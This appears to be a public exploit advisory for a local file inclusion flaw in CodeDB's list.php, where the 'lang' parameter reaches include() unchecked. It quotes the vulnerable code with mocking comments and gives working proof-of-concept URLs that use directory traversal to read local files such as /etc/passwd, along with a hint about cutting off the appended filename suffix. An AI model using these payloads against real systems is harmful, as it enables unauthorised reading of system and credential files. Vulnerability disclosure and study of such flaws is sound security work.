CodeDB (list.php lang) Local File Inclusion Vulnerability

###############################################################################

#

# Name : CodeDB (list.php lang) Local File Inclusion Vulnerability

# Author : cOndemned

# Greetz : ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*

#

###############################################################################

Source :

// list.php

2. $lang = htmlspecialchars($_GET[\’lang\’]); // ok, but…. for what ? lol

7. if(file_exists(\’templates/\’.$lang.\’_middle.php\’)) // We\’ll have to cut off rest of filename & extension

8. include(\’templates/\’.$lang.\’_middle.php\’); // Ekhm… pwned ;d

Proof of Concept :

http://[host]/[codeDB_path]/list.php?lang=../readme.txt

http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd

http://[host]/[codeDB_path]/list.php?lang=../[local_file]

EoF.